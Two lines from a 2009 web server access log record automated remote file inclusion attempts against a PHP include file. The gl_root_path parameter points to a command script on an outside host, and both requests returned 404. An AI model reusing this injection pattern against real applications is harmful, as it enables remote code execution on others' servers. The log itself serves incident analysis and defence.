88.84.128.40 - - [08/May/2009:01:54:27 -0400] "GET /include/functions_common.php?gl_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:01:54:27 -0400] "GET /logs/include/functions_common.php?gl_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
